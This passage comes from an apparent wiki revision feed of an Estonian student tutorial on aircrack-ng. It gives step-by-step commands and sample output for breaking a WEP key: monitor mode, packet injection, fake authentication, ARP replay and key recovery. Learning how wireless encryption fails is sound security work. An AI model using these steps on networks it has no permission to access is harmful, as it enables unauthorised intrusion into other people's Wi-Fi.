&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89325</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89325"/>
		<updated>2015-05-25T19:50:15Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Lühikesed tegevussammud */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
